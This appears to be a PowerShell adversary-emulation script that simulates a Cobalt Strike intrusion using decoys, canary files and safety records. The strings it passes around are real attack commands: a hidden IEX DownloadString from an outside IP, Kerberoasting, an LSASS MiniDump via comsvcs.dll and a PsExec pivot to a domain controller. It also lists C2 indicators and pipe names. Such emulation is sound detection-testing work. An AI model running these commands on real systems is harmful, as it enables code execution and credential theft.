#Requires -Version 5.1
#Requires -RunAsAdministrator
[CmdletBinding()]param([switch]$LabConfirmed)
. "$PSScriptRoot\BumbleRoastSim-utilities.ps1";Assert-BumbleRoastSafety -LabConfirmed:$LabConfirmed;$p=Initialize-BumbleRoastEnvironment
$ps=Join-Path $p.Payloads 'powershell.exe';New-BumbleRoastDecoy $ps 'in-memory PowerShell Cobalt stand-in';Invoke-BumbleRoastDecoy $ps 'cmd.exe /C powershell.exe -nop -w hidden -c IEX WebClient.DownloadString(http://104.243.33.50:80/a)' 'wab.exe';Invoke-BumbleRoastLoopback 80 '104.243.33.50:80/a Cobalt payload hosting' 'HTTP payload marker';Invoke-BumbleRoastLoopback 443 '108.62.12.174 / dofixifa.com /ro and /styles' 'day-eleven Cobalt marker'
Invoke-BumbleRoastDecoy $ps 'Invoke-Kerberoast -OutputFormat HashCat | Out-File C:\ProgramData\REDACTED\ps.txt' 'injected svchost.exe';Write-BumbleRoastFile(Join-Path $p.Staging 'ps.txt')'GENERATED KERBEROAST OUTPUT-NAME CANARY. Contains no account, ticket, or hash.''credential canary';Write-BumbleRoastFile(Join-Path $p.Evidence 'kerberoast-negative-record.json')(@{SPNsQueried=0;RC4TicketsRequested=0;ticketOptionsReported='0x40810000';encryptionTypeReported='0x17';hashesCollected=0;passwordsCracked=0;accountsAuthenticated=0}|ConvertTo-Json)'Kerberoast safety record'
$dump=Join-Path $p.Payloads 'rundll32.exe';New-BumbleRoastDecoy $dump 'comsvcs MiniDump stand-in';Invoke-BumbleRoastDecoy $dump 'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full' 'injected svchost.exe';Write-BumbleRoastFile(Join-Path $p.Staging 'comsvcs-lsass.dmp')'GENERATED DUMP-NAME CANARY. No process memory or secrets.''credential canary'
Write-BumbleRoastFile(Join-Path $p.Payloads 's.bat')'@REM REPORTED ONLY: enumerate servers.txt with ping and write serv.log. No packets sent.''server scan canary';Write-BumbleRoastFile(Join-Path $p.Payloads 'w.bat')'@REM REPORTED ONLY: enumerate workers.txt with ping and write work.log. No packets sent.''workstation scan canary';Write-BumbleRoastFile(Join-Path $p.Staging 'servers.txt')"LAB-SRV01.invalid`nLAB-DC01.invalid"'generated target list';Write-BumbleRoastFile(Join-Path $p.Staging 'workers.txt')"LAB-WS01.invalid`nLAB-WS02.invalid"'generated target list';Write-BumbleRoastFile(Join-Path $p.Staging 'serv.log')'GENERATED SERVER SCAN OUTPUT. No packets sent.''scan output';Write-BumbleRoastFile(Join-Path $p.Staging 'work.log')'GENERATED WORKSTATION SCAN OUTPUT. No packets sent.''scan output';Invoke-BumbleRoastDecoy $ps 's.bat and w.bat ping target lists; Invoke-ShareFinder -CheckShareAccess; third AdFind run' 'PowerShell Cobalt'
$beacon=Join-Path $p.Payloads 'edc603a.exe';New-BumbleRoastDecoy $beacon 'random PsExec Cobalt service stand-in';Invoke-BumbleRoastDecoy $beacon 'kerberoasted Domain Admin service account -> jump psexec LAB-DC01 -> service edc603a -> rundll32 beacon' 'services.exe';foreach($port in @(445,135)){Invoke-BumbleRoastLoopback $port "Domain Controller PsExec/service-account pivot, port $port" 'lateral marker'}
$pipes=@('\postex_0dde','\postex_3e9b','\postex_4008','\postex_4429','\postex_55f8','\postex_8248','\postex_8c73','\postex_972d','\postex_fc2e');Write-BumbleRoastFile(Join-Path $p.Evidence 'named-pipe-negative-record.json')(@{reportedNames=$pipes;pipesCreated=0;processesInjected=0}|ConvertTo-Json)'Cobalt pipe safety record';Write-BumbleRoastFile(Join-Path $p.Evidence 'day11-outcome-negative-record.json')(@{payloadsDownloaded=0;PowerShellCodeExecuted=$false;LSASSAccessed=$false;credentialsCollected=0;directoryOrShareQueries=0;pingPacketsSent=0;remoteHostsTouched=0;domainControllersTouched=0;accountsAuthenticated=0;servicesCreated=0;filesDeleted=0;bytesExfiltrated=0;filesEncrypted=0;impactActions=0;outcome='evicted before likely ransomware deployment'}|ConvertTo-Json -Depth 5)'final safety record';Add-BumbleRoastTimeline 240 execution 'Day-eleven PowerShell downloads and executes in-memory Cobalt and injects processes' @{downloads=0;codeExecuted=$false;processesInjected=0;techniques=@('T1059.001','T1105','T1055')};Add-BumbleRoastTimeline 241 credential-access 'Invoke-Kerberoast HashCat output and comsvcs MiniDump LSASS represented' @{ticketsRequested=0;LSASSAccessed=$false;techniques=@('T1558.003','T1003.001')};Add-BumbleRoastTimeline 242 discovery 'Third AdFind, ShareFinder, s.bat, and w.bat target-list activity represented' @{directoryQueries=0;shareQueries=0;packetsSent=0};Add-BumbleRoastTimeline 244 lateral-movement 'Cracked weak Domain Admin service account and PsExec random service pivot to DC represented' @{passwordsCracked=0;domainControllersTouched=0;servicesCreated=0;techniques=@('T1078','T1021.002','T1569')};Add-BumbleRoastTimeline 264 conclusion 'Evicted before assessed domain-wide ransomware objective; no exfiltration, encryption, or destruction' @{impactActions=0}
